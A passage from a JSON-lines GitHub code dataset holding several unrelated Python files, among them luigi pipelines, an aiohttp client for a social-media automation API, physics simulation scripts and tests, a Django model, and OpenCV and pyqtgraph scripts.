def requires(self):\n return [\n self.clone(ExtractFeature, feature_name=x) for x in self.features_as_array\n ]\n\n def output(self):\n hash_content = f'{self.features}|{self.id_column}|{self.dataset}'\n hash_object = hashlib.md5(hash_content.encode('utf-8'))\n digest = hash_object.hexdigest()[:6]\n return luigi.LocalTarget(f'_features/fasttext_input_{digest}.txt')\n\n def run(self):\n self.output().makedirs()\n\n dfs = [joblib.load(x.path) for x in self.input()]\n s_features = [df[x].fillna('') for df, x in zip(dfs, self.features_as_array)]\n joined_rows = reduce(concat_rowwise, s_features)\n with open(self.output().path, 'w+') as out_file:\n out_file.write('\\n\\n#####\\n'.join(joined_rows))\n\n\n@requires(FastTextInput)\nclass FastTextVectors(luigi.Task):\n fasttext_path = luigi.Parameter(\n significant=False,\n default='~/projects/fasttext/fasttext',\n )\n\n def output(self):\n hash_content = f'{self.features}|{self.id_column}|{self.dataset}'\n hash_object = hashlib.md5(hash_content.encode('utf-8'))\n digest = hash_object.hexdigest()[:6]\n return luigi.LocalTarget(f'_features/fasttext_model_{digest}.vec')\n\n def run(self):\n self.output().makedirs()\n\n fasttext = local[self.fasttext_path]\n out_path, _ = os.path.splitext(self.output().path)\n\n fasttext['skipgram', '-input',\n self.input().path, '-output', out_path, '-minn', '1'] & FG\n","repo_name":"xelibrion/kaggle-avito-demand-prediction","sub_path":"src/pipeline/feature_eng/text/fasttext.py","file_name":"fasttext.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21933789927","text":"#\n\nfrom __future__ import annotations\n\nimport asyncio\nfrom functools import wraps\nfrom typing import Dict\n\nfrom aiohttp import ClientSession, TCPConnector\nfrom loguru import logger\n\nfrom .schemas.fake import InstanceTypes\n\n\nclass FakeAPI:\n def __init__(self, host: str, port: int):\n self._host = host\n self._port = port\n self._client_session: ClientSession | None = None\n\n async def start(self):\n connector = TCPConnector(limit=50)\n self._client_session = 
ClientSession(connector=connector)\n\n    async def stop(self):\n        await self._client_session.close()\n\n    @property\n    def base_url(self) -> str:\n        return f'http://{self._host}:{self._port}{{method}}'\n\n    @staticmethod\n    def retry_async(num_tries):\n        def decorator(func):\n            @wraps(func)\n            async def wrapper(*args, **kwargs):\n                for i in range(num_tries):\n                    try:\n                        return await func(*args, **kwargs)\n                    except Exception as e:\n                        if i == num_tries - 1:\n                            logger.error(e)\n                            raise e\n                        await asyncio.sleep(0.02)\n\n            return wrapper\n\n        return decorator\n\n    \"\"\"\n    Fakes\n    \"\"\"\n\n    @retry_async(3)\n    async def analyze(self, instance: str, last_max_id: str | None) -> Dict[str, str]:\n        params = {'instance': instance}\n        if last_max_id:\n            params['last_max_id'] = last_max_id\n        response = await self._client_session.post(\n            self.base_url.format(method=f'/api/analyze/analyze'),\n            params=params)\n        return await response.json()\n\n    @retry_async(3)\n    async def unfollow(self, action_id: str, instance: str) -> Dict[str, str]:\n        response = await self._client_session.post(\n            self.base_url.format(method=f'/api/analyze/unfollow'),\n            params={'action_id': action_id, 'instance': instance})\n        return await response.json()\n\n    @retry_async(3)\n    async def like(self, account_id: str, instance: str, instance_type: InstanceTypes,\n                   last_max_id: str | None = None, bio: str | None = None) -> Dict[str, str]:\n        response = await self._client_session.post(\n            self.base_url.format(method=f'/api/story_like/like'),\n            params={'instance': instance, 'last_max_id': last_max_id, 'instance_type': instance_type,\n                    'account_id': account_id, 'bio': bio})\n        return await response.json()\n","repo_name":"bubled33/instaproapi","sub_path":"instaproapi/fake_api.py","file_name":"fake_api.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42198466452","text":"from collections import OrderedDict\nimport itertools\nimport sys\n\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\n\nfrom flowket.callbacks.monte_carlo import TensorBoardWithGeneratorValidationData, \\\n    default_wave_function_stats_callbacks_factory\nfrom flowket.machines import SimpleConvNetAutoregressive1D, ComplexValuesSimpleConvNetAutoregressive1D\nfrom flowket.operators import Heisenberg\nfrom flowket.optimization import VariationalMonteCarlo, loss_for_energy_minimization\nfrom flowket.samplers import FastAutoregressiveSampler\n\nparams_grid_config = {\n    'width': [16, 32],\n    'depth': [5, 8],\n    'lr': [1e-3, 1e-2, 5e-3],\n    'complex_ops': [True, False]\n}\nrun_index = int(sys.argv[-1].strip())\nks, vs = zip(*params_grid_config.items())\nparams_options = list(itertools.product(*vs))\nchosen_v = params_options[run_index % len(params_options)]\nparams = dict(zip(ks, chosen_v))\nprint('Chosen params: %s' % str(params))\n\nhilbert_state_shape = (20,)\ninputs = Input(shape=hilbert_state_shape, dtype='int8')\nif params['complex_ops']:\n    convnet = ComplexValuesSimpleConvNetAutoregressive1D(inputs, depth=params['depth'],\n                                                         num_of_channels=params['width'], max_dilation_rate=4)\nelse:\n    convnet = SimpleConvNetAutoregressive1D(inputs, depth=params['depth'], num_of_channels=params['width'] * 2,\n                                            max_dilation_rate=4, weights_normalization=False)\npredictions, conditional_log_probs = convnet.predictions, convnet.conditional_log_probs\nmodel = Model(inputs=inputs, outputs=predictions)\nconditional_log_probs_model = 
Model(inputs=inputs, outputs=conditional_log_probs)\n\nbatch_size = 1000\nsteps_per_epoch = 300\n\noptimizer = Adam(lr=params['lr'], beta_1=0.9, beta_2=0.999)\nmodel.compile(optimizer=optimizer, loss=loss_for_energy_minimization)\nmodel.summary()\noperator = Heisenberg(hilbert_state_shape=hilbert_state_shape, pbc=True)\nsampler = FastAutoregressiveSampler(conditional_log_probs_model, batch_size)\nvariational_monte_carlo = VariationalMonteCarlo(model, operator, sampler)\n\nrun_name = 'naqs_complex_ops_%s_dilation_depth_%s_width_%s_adam_lr_%s_run_%s' % \\\n (params['complex_ops'], params['depth'], params['width'], params['lr'], run_index)\ntensorboard = TensorBoardWithGeneratorValidationData(log_dir='tensorboard_logs/%s' % run_name,\n generator=variational_monte_carlo, update_freq=1,\n histogram_freq=1, batch_size=batch_size, write_output=False)\ncallbacks = default_wave_function_stats_callbacks_factory(variational_monte_carlo,\n true_ground_state_energy=-35.6175461195) + [tensorboard]\nmodel.fit_generator(variational_monte_carlo.to_generator(), steps_per_epoch=steps_per_epoch, epochs=15,\n callbacks=callbacks, max_queue_size=0, workers=0)\n","repo_name":"HUJI-Deep/FlowKet","sub_path":"examples/complex_ops_autoregressive_heisenberg_1d.py","file_name":"complex_ops_autoregressive_heisenberg_1d.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"31"} +{"seq_id":"38010004640","text":"'''Provides workflows for data preparation for annotation for\nthe worm segmentation training workflow.\n\n'''\nimport luigi\n\nfrom ggjw.workflows.base import JobSystemWorkflow\n\nfrom ggjw.tasks.segmentation.prepare_for_annotation import PrepareRandomlySelectedImagesForAnnotation\nfrom ggjw.tasks.segmentation.prepare_for_annotation import PrepareManuallySelectedImagesForAnnotation\n\n# NOTE this defines the workflows as they are picked up by the MJS\n# frontend. 
Unfortunately, it does not discover inherited parameters,\n# so we have to replicate the parameter definition here instead\n# of just using inheritance.\n\n\nclass PrepareRandomlySelectedImagesForAnnotationWorkflow(\n        luigi.WrapperTask, JobSystemWorkflow):\n    '''Prepare images for annotation by random sampling from\n    the given experiment.\n    '''\n\n    input_folder = luigi.Parameter()\n    '''Input folder to collect from.\n    '''\n\n    file_pattern = luigi.Parameter()\n    '''Filename pattern matching files to be included.\n    Allowed wildcards are *, ?, [seq] and [!seq] (see fnmatch)\n    '''\n\n    output_folder = luigi.Parameter()\n    '''Output folder to write projections into.\n    '''\n\n    num_samples = luigi.IntParameter()\n    '''Number of samples to draw.\n    '''\n\n    seed = luigi.IntParameter(default=13)\n    '''Seed for random sampling.\n    '''\n\n    task_namespace = 'ggrosshans'\n\n    def requires(self):\n        '''launch the actual worker tasks.\n        '''\n        yield PrepareRandomlySelectedImagesForAnnotation(\n            input_folder=self.input_folder,\n            output_folder=self.output_folder,\n            file_pattern=self.file_pattern,\n            num_samples=self.num_samples,\n            seed=self.seed)\n\n\nclass PrepareManuallySelectedImagesForAnnotationWorkflow(\n        luigi.WrapperTask, JobSystemWorkflow):\n    '''Prepare images for annotation based on a manually generated\n    list of positions and timepoints.\n    '''\n\n    input_folder = luigi.Parameter()\n    '''Input folder to collect from.\n    '''\n\n    file_pattern = luigi.Parameter()\n    '''Filename pattern matching files to be included.\n    Allowed wildcards are *, ?, [seq] and [!seq] (see fnmatch).\n\n    Note that this pattern should *not* contain position, timepoint or\n    file extension as it will be combined with subfolder, position and\n    timepoint from the given input_file.\n\n    '''\n\n    output_folder = luigi.Parameter()\n    '''Output folder to write projections into.\n    '''\n\n    input_file = luigi.Parameter()\n    '''Manually generated collections of images to prepare [.csv].\n\n    Must contain the following columns:\n\n    folder, position, timepoint\n\n    the files are expected at the following location:\n\n    //\n    '''\n\n    task_namespace = 'ggrosshans'\n\n    def requires(self):\n        '''launch the actual worker tasks.\n        '''\n        yield PrepareManuallySelectedImagesForAnnotation(\n            input_folder=self.input_folder,\n            output_folder=self.output_folder,\n            input_file=self.input_file,\n            file_pattern=self.file_pattern)\n","repo_name":"fmi-basel/ggrosshans-jobsystem-workflows","sub_path":"ggjw/workflows/worm_segm_annotation.py","file_name":"worm_segm_annotation.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28283120752","text":"from django.db import models\n\n# Create your models here.\n\n\nclass Resume(models.Model):\n\t# python -m pip install Pillow\n\tuser_image = models.ImageField(\n\t\tupload_to ='images', \n\t\tmax_length=255,\n\t\tdefault='/images/user_image.jpg')\n\tuser_full_name = models.CharField(\n\t\tmax_length=200,\n\t\tverbose_name='Full Name'\n\t\t)\n\tuser_job=models.CharField(\n\t\tmax_length=250,\n\t\tblank=True,\n\t\tnull=True,\n\t\tdefault='Programmer',\n\t\t)\n\tuser_description=models.CharField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tmax_length=500\n\t\t)\n\tuser_experience=models.TextField(\n\t\tverbose_name='My Experience as a Django Developer',\n\t\tdefault='No experience:)'\n\t\t)\n\tuser_knowledge=models.TextField(\n\t\tverbose_name='What I Know'\n\t\t)\n\n\tuser_skill=models.TextField(\n\t\tverbose_name='Education and 
Training',\n\t\t)\n\tuser_achievement=models.TextField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tverbose_name='My Achievements'\n\t\t)\n\textra_info=models.TextField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tverbose_name='Extra Information',\n\t\tdefault='No Information',\n\t\t)\n\n\tdef __str__(self):\n\t\treturn f\"Hi I'm {self.user_full_name}!\\n{self.user_description}\"","repo_name":"jamshid1598/Portfolio_Example","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16385409375","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mpd\nimport numpy as np\n\nimport sys,os\nxpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,'thirdParty','pyqtgraph-0.9.10'))\nsys.path.append(xpower)\nimport pyqtgraph as pg\n\nfrom PyQt4 import QtGui,QtCore\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n\nclass midBaseAnalyzer():\n    \"\"\"\"\"\"\n    #----------------------------------------------------------------------\n    def __init__(self,Globals=None):\n        \"\"\"\n        When run inside XPower, objects of this class are temporary.\n        When the object backs a display window, it must not be released after show() is called,\n        so this parent-object parameter is passed in to give this object the same lifetime as its parent.\n        To let a popup window be opened several times side by side, the popup object must also be re-created and registered globally.\n        \"\"\"\n        self.Globals = Globals\n        self.Globals.append(self)\n    def addText(self,ax,xAxis,yAxis):    #mid add some y value to ax.\n        for x,y in zip(xAxis,yAxis):\n            text = '('+str(round(y,3))+')'\n            ax.annotate(text,xy=(x,y)) \n    #----------------------------------------------------------------------\n    def portfolioPlot(self,ax,bDrawText=False):\n        \"\"\"\"\"\"\n        date = np.array([mpd.date2num(date) for date in self.results.index]) \n        if 'portfolio_value' in self.results:\n            ax.plot(date,self.results.portfolio_value,pen=(255,255,255))\n            ax.scatterAddition(date, self.results.portfolio_value) \n    def positionCostPlot(self,ax,bDrawText=False): \n        if 'position_cost' in self.results:\n            position_cost = self.results.position_cost\n            date = np.array([mpd.date2num(date) for date in self.results.index]) \n            \n            indexOfZero = position_cost[:] == 0\n            count = len(position_cost[indexOfZero])\n            \n            #date[0:count] = position_cost[count]\n            \n            dateOfNoneZero = date[count:]\n            position_costOfNoneZero = position_cost[count:]\n            \n            ax.plot(dateOfNoneZero,position_costOfNoneZero ,pen=(255,255,255), name=\"Position curve\")\n            ax.scatterAddition(dateOfNoneZero, position_costOfNoneZero) \n    \n    def positionVolumePlot(self,ax,bDrawText=False): \n        if 'position_volume' in self.results:\n            position_volume = self.results.position_volume\n            date = np.array([mpd.date2num(date) for date in self.results.index]) \n            \n            ax.plot(date, position_volume,pen=(255,255,255), name=\"Position curve\")\n            ax.scatterAddition(date, position_volume) \n        \n    def positionPnlPlot(self,ax,bDrawText=False):\n        date = np.array([mpd.date2num(date) for date in self.results.index])\n        if 'position_pnl' in self.results:\n            position_pnl = np.array(self.results.position_pnl)\n            ax.plot(date,position_pnl , pen=(255,255,255), name=\"Red curve\")\n            ax.scatterAddition(date, position_pnl) \n\n    #----------------------------------------------------------------------\n    def pricePlot(self,ax,bDrawText=False):\n        \"\"\"\"\"\"\n        date = np.array([mpd.date2num(date) for date in self.results.index]) \n        if 'AAPL' in self.results:\n            ax.plot(date,self.results.AAPL)\n            ax.scatterAddition(date, self.results.AAPL)\n\n    def 
initDialog(self,results=None,KData=None,bDrawText=False,InKLine = False):\n        # 1) creates layouts\n        dialog = QtGui.QDialog() \n        mainLayout = QtGui.QHBoxLayout()\n        rightLayout = QtGui.QVBoxLayout()\n        mainLayout.addLayout(rightLayout)\n        dialog.setLayout(mainLayout) \n        dialog.setWindowTitle(('Strategy Results'))\n\n        import os,sys \n        xpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,'midProjects','histdataUI'))\n        sys.path.append(xpower)\n\n        from Widgets.pgCandleWidgetCross import pgCandleWidgetCross\n        from Widgets.pgCrossAddition import pgCrossAddition\n        from pyqtgraph.dockarea import DockArea,Dock \n        area = DockArea() \n        rightLayout.addWidget(area)\n\n        # 2) creates widgets \n        # 2.1)candle \n        pgCandleView = pgCandleWidgetCross(dataForCandle=KData) \n        self.pricePlot(pgCandleView) \n        if(InKLine):\n            self.indicatorsPlot(pgCandleView) \n            self.signalPlot(pgCandleView,yBuy = KData.take([1],axis=1),ySell = KData.take([1],axis=1))\n        dCandle = Dock(\"candles\",closable=True, size=(200,300)) ## give this dock the minimum possible size\n        area.addDock(dCandle, 'bottom') \n        dCandle.addWidget(pgCandleView) \n\n        # 2.2)position_pnl: current position_pnl curve\n        if(True):\n            PyqtGraphPnl = pgCrossAddition()\n            self.positionPnlPlot(PyqtGraphPnl,bDrawText=bDrawText)\n            position_pnl = np.array(self.results.position_pnl)\n            self.signalPlot(PyqtGraphPnl,yBuy = position_pnl,ySell = position_pnl)\n            dPnl = Dock(\"position_pnl\", closable=True, size=(200,100))\n            area.addDock(dPnl, 'bottom') \n            dPnl.addWidget(PyqtGraphPnl) \n            PyqtGraphPnl.setXLink(pgCandleView)\n        # 2.3)position_cost \n        if(True):\n            PyqtGraphPositionCost = pgCrossAddition()\n            self.positionCostPlot(PyqtGraphPositionCost)\n            dPositionCost = Dock(\"position_cost\",closable=True, size=(200,100))\n            area.addDock(dPositionCost, 'bottom') \n            dPositionCost.addWidget(PyqtGraphPositionCost) \n            PyqtGraphPositionCost.setXLink(pgCandleView) \n        # 2.3)position_volume\n        if(False):\n            PyqtGraphPosition = pgCrossAddition()\n            self.positionVolumePlot(PyqtGraphPosition)\n            dPosition = Dock(\"position_volume\",closable=True, size=(200,100))\n            area.addDock(dPosition, 'bottom') \n            dPosition.addWidget(PyqtGraphPosition) \n            PyqtGraphPosition.setXLink(pgCandleView)\n        # 2.4)portfolio: total asset value curve, cash + equity\n        if(True):\n            PyqtGraphPortfolio = pgCrossAddition()\n            self.portfolioPlot(PyqtGraphPortfolio)\n            dPortfolio = Dock(\"portfolio\", closable=True,size=(200,100))\n            area.addDock(dPortfolio, 'bottom') \n            dPortfolio.addWidget(PyqtGraphPortfolio) \n            PyqtGraphPortfolio.setXLink(pgCandleView)\n        # 2.5)indicator\n        if(True):\n            PyqtGraphindicators = pgCrossAddition()\n            self.pricePlot(PyqtGraphindicators) \n            self.indicatorsPlot(PyqtGraphindicators)\n            \n            self.signalPlot(PyqtGraphindicators)\n            \n            dIndicator = Dock(\"indicator\",closable=True, size=(200,100))\n            dIndicator.addWidget(PyqtGraphindicators)\n            area.addDock(dIndicator, 'bottom', dCandle) \n            PyqtGraphindicators.setXLink(pgCandleView)\n        return dialog\n    def analyze(self,results=None,KData=None,bDrawText=False,InKLine = False):\n        # Plot the portfolio and asset data.\n        self.results = results \n        dialog = self.initDialog(results=results, KData=KData,InKLine = InKLine)\n        self.Globals.append(dialog)\n        dialog.showMaximized() \n        \n","repo_name":"UpSea/PyAlgoTradeMid","sub_path":"upsea_Ver_0.1/Ea_00_BaseClass/midBaseAnalyzer.py","file_name":"midBaseAnalyzer.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"19928330278","text":"import calculator\n\n\ndef test_add_both_positive():\n # Setup\n a = 3\n b = 2\n # Specify expected result\n expected = 5\n # Exercise system under test\n actual = calculator.add(a, b)\n # Verify result\n assert actual == expected\n","repo_name":"SabrinaHuajy/ResearchCodingClub.github.io","sub_path":"examples/tdd_19113/test_calculator.py","file_name":"test_calculator.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"39775373722","text":"# -*- coing:utf-8 -*-\nimport tensorflow as tf\n# =================================================\n# read MNIST DB\n# =================================================\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"data/\", one_hot=True)\n\nimport numpy as np\nimport cv2 #opencv 모듈을 불러오기 위해서는 import opencv가 아니라 import cv2를 하여야한다.\n\nn1 = np.random.randint(10,200,[256,256,3]) #유색의 랜덤한 그림을 만든다.\n#n1 = np.zeros([1792,828,3]) #828 x 1792짜리 jpg파일을 만들 틀.\n#n1[:][:][0] = np.random.randint(10,200,[1792,828])\n\n\nimage=cv2.imread(\"9D194DF8-01FE-4E4E-8AE0-522C77143077.jpg\",-1) #cv2.imread(디렉토리 상의 파일 이름, 그 파일을 어떤식으로 읽을 것인지 모드 정하기) -> ndarray 반환\nprint(f'image의 타입 : {type(image)}, image의 shape : {image.shape}, image의 값 : {image}')\ntmp= cv2.namedWindow('window',cv2.WINDOW_NORMAL)\n#cv2.imshow('window',n1); cv2.waitKey(0)\nmodified_image = {}\n\nmodified_image['up_down_invert'] = image[::-1]\nmodified_image['half_row'] = image[:len(image)//2]\nmodified_image['column_row'] = image.transpose()[:len(image.transpose())//2].transpose()\nprint(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n#print(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n#print(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n\n\n#window = cv2.namedWindow('Koala', cv2.WINDOW_AUTOSIZE) #WINDOW_AUTOSIZE\n#cv2.imshow(window, image); cv2.waitKey(0);\nimage = -image; #근데 이것도 몇비트 사진인가에 따라 다른거 아닌가? 아니였음.. 
그림이 24비트 사진이라 해도 이건 무조건 255였네.\n#cv2.imshow('Inverted Koala',image); cv2.waitKey(0);\n#cv2.imwrite(\"inverted_sw.jpg\", image)\n\nfor i in range(50): #애니 매이션 만들기\n if (i%10 == 0) or (i%10 == 1) or(i%10 == 2) or(i%10 == 3) or(i%10 == 4): #반은 흑백, 반은 컬러 처리\n n1 = np.random.randint(np.random.randint(0,20,[1]), np.random.randint(100,300,[1]), [256, 256])\n else :\n n1 = np.random.randint(np.random.randint(0,20,[1]), np.random.randint(100,300,[1]), [256, 256,3])\n\n cv2.imwrite('muneo.jpg',n1)\n image = cv2.imread('muneo.jpg', -1)\n cv2.imshow('Random_Animation',image)\n cv2.waitKey(100)\nwindow = cv2.namedWindow('Number_Animation', cv2.WINDOW_NORMAL)\nfor i in range(5): #애니 매이션 만들기\n cv2.imshow(window,mnist.test.images[np.random.randint(0,10000)])\n cv2.waitKey(1000)\n\n\ncv2.destroyAllWindows()\n\n#column_half = n1.transpose()[:len(n1.transpose())//2]","repo_name":"hangdragon/DNN","sub_path":"openCV/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16302444391","text":"import unittest\n\nimport jVMC\nimport jVMC.operator as op\nimport jax\nimport jax.numpy as jnp\n\n\nclass TestPOVM(unittest.TestCase):\n def prepare_net(self, L, dt, hiddenSize=1, depth=1, cell=\"RNN\"):\n def copy_dict(a):\n b = {}\n for key, value in a.items():\n if type(value) == type(a):\n b[key] = copy_dict(value)\n else:\n b[key] = value\n return b\n\n sample_shape = (L,)\n\n self.psi = jVMC.util.util.init_net({\"batch_size\": 200, \"net1\":\n {\"type\": \"RNN\",\n \"translation\": {\"use\": True, \"factor\": 1},\n \"parameters\": {\"inputDim\": 4,\n \"realValuedOutput\": True,\n \"realValuedParams\": True,\n \"logProbFactor\": 1, \"hiddenSize\": hiddenSize, \"L\": L, \"depth\": depth, \"cell\": cell}}},\n sample_shape, 1234)\n\n system_data = {\"dim\": \"1D\", \"L\": L}\n self.povm = op.POVM(system_data)\n\n prob_dist = jVMC.operator.povm.get_1_particle_distributions(\"y_up\", self.povm)\n prob_dist /= prob_dist[0]\n biases = jnp.log(prob_dist[1:])\n params = copy_dict(self.psi._param_unflatten(self.psi.get_parameters()))\n\n params[\"net\"][\"outputDense\"][\"bias\"] = biases\n params[\"net\"][\"outputDense\"][\"kernel\"] = 1e-15 * params[\"net\"][\"outputDense\"][\"kernel\"]\n params = jnp.concatenate([p.ravel()\n for p in jax.tree_util.tree_flatten(params)[0]])\n self.psi.set_parameters(params)\n\n self.sampler = jVMC.sampler.ExactSampler(self.psi, (L,), lDim=4, logProbFactor=1)\n\n self.tdvpEquation = jVMC.util.tdvp.TDVP(self.sampler, rhsPrefactor=-1.,\n svdTol=1e-6, diagonalShift=0, makeReal='real', crossValidation=False)\n\n #self.stepper = jVMC.util.stepper.Euler(timeStep=dt) # ODE integrator\n self.stepper = jVMC.util.stepper.Heun(timeStep=dt) # ODE integrator\n\n def test_matrix_to_povm(self):\n unity = jnp.eye(2)\n zero_matrix = jnp.zeros((2, 2))\n\n system_data = {\"dim\": \"1D\", \"L\": 2}\n povm = jVMC.operator.POVM(system_data)\n\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='observable'),\n jnp.ones(4)).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='unitary'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='dissipative'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='imaginary'),\n -2*jnp.eye(4)).all())\n\n self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, 
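The script above inverts an image with unary minus, which wraps modulo 256 on uint8 arrays. A minimal sketch of the same invert-and-write round trip that needs no external image file (the gradient is synthetic; file names are illustrative):

import numpy as np
import cv2

img = np.tile(np.arange(256, dtype=np.uint8), (256, 1))  # horizontal gray gradient
inverted = 255 - img          # explicit uint8 inversion, equivalent to -img mod 256
cv2.imwrite('gradient.jpg', img)
cv2.imwrite('gradient_inverted.jpg', inverted)

Writing 255 - img makes the wrap-around explicit, which is why the bit depth of the source never mattered in the experiment above: OpenCV loads 24-bit JPEGs as three uint8 channels either way.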
+{"seq_id":"16302444391","text":"import unittest\n\nimport jVMC\nimport jVMC.operator as op\nimport jax\nimport jax.numpy as jnp\n\n\nclass TestPOVM(unittest.TestCase):\n    def prepare_net(self, L, dt, hiddenSize=1, depth=1, cell=\"RNN\"):\n        def copy_dict(a):\n            b = {}\n            for key, value in a.items():\n                if type(value) == type(a):\n                    b[key] = copy_dict(value)\n                else:\n                    b[key] = value\n            return b\n\n        sample_shape = (L,)\n\n        self.psi = jVMC.util.util.init_net({\"batch_size\": 200, \"net1\":\n                                            {\"type\": \"RNN\",\n                                             \"translation\": {\"use\": True, \"factor\": 1},\n                                             \"parameters\": {\"inputDim\": 4,\n                                                            \"realValuedOutput\": True,\n                                                            \"realValuedParams\": True,\n                                                            \"logProbFactor\": 1, \"hiddenSize\": hiddenSize, \"L\": L, \"depth\": depth, \"cell\": cell}}},\n                                           sample_shape, 1234)\n\n        system_data = {\"dim\": \"1D\", \"L\": L}\n        self.povm = op.POVM(system_data)\n\n        prob_dist = jVMC.operator.povm.get_1_particle_distributions(\"y_up\", self.povm)\n        prob_dist /= prob_dist[0]\n        biases = jnp.log(prob_dist[1:])\n        params = copy_dict(self.psi._param_unflatten(self.psi.get_parameters()))\n\n        params[\"net\"][\"outputDense\"][\"bias\"] = biases\n        params[\"net\"][\"outputDense\"][\"kernel\"] = 1e-15 * params[\"net\"][\"outputDense\"][\"kernel\"]\n        params = jnp.concatenate([p.ravel()\n                                  for p in jax.tree_util.tree_flatten(params)[0]])\n        self.psi.set_parameters(params)\n\n        self.sampler = jVMC.sampler.ExactSampler(self.psi, (L,), lDim=4, logProbFactor=1)\n\n        self.tdvpEquation = jVMC.util.tdvp.TDVP(self.sampler, rhsPrefactor=-1.,\n                                                svdTol=1e-6, diagonalShift=0, makeReal='real', crossValidation=False)\n\n        #self.stepper = jVMC.util.stepper.Euler(timeStep=dt)  # ODE integrator\n        self.stepper = jVMC.util.stepper.Heun(timeStep=dt)  # ODE integrator\n\n    def test_matrix_to_povm(self):\n        unity = jnp.eye(2)\n        zero_matrix = jnp.zeros((2, 2))\n\n        system_data = {\"dim\": \"1D\", \"L\": 2}\n        povm = jVMC.operator.POVM(system_data)\n\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='observable'),\n                                    jnp.ones(4)).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='unitary'),\n                                    jnp.zeros((4, 4))).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='dissipative'),\n                                    jnp.zeros((4, 4))).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='imaginary'),\n                                    -2*jnp.eye(4)).all())\n\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='observable'),\n                                    jnp.zeros(4)).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='unitary'),\n                                    jnp.zeros((4, 4))).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='dissipative'),\n                                    jnp.zeros((4, 4))).all())\n        self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='imaginary'),\n                                    jnp.zeros((4, 4))).all())\n\n        self.assertRaises(ValueError, op.matrix_to_povm, zero_matrix, povm.M, povm.T_inv, mode='wrong_mode')\n\n    def test_adding_operator(self):\n        unity = jnp.eye(2)\n        zero_matrix = jnp.zeros((2, 2))\n\n        system_data = {\"dim\": \"1D\", \"L\": 2}\n        povm = jVMC.operator.POVM(system_data)\n\n        unity_povm = op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='unitary')\n        zeros_povm = op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='dissipative')\n\n        self.assertFalse(\"unity\" in povm.operators.keys())\n        self.assertFalse(\"zero\" in povm.operators.keys())\n\n        povm.add_unitary(\"unity\", unity_povm)\n        povm.add_dissipator(\"zero\", zeros_povm)\n\n        self.assertTrue(\"unity\" in povm.operators.keys())\n        self.assertTrue(\"zero\" in povm.operators.keys())\n\n        self.assertRaises(ValueError, povm.add_unitary, \"zero\", op.matrix_to_povm(zero_matrix, povm.M,\n                                                                                  povm.T_inv, mode='unitary'))\n        self.assertRaises(ValueError, povm.add_dissipator, \"unity\", op.matrix_to_povm(unity, povm.M,\n                                                                                      povm.T_inv, mode='dissipative'))\n\n    def test_time_evolution_one_site(self):\n        # This tests the time evolution of a sample system and compares it with the analytical solution\n\n        L = 3\n        Tmax = 0.5\n        dt = 2E-3\n\n        self.prepare_net(L, dt, hiddenSize=1, depth=1)\n\n        Lindbladian = op.POVMOperator(self.povm)\n        for l in range(L):\n            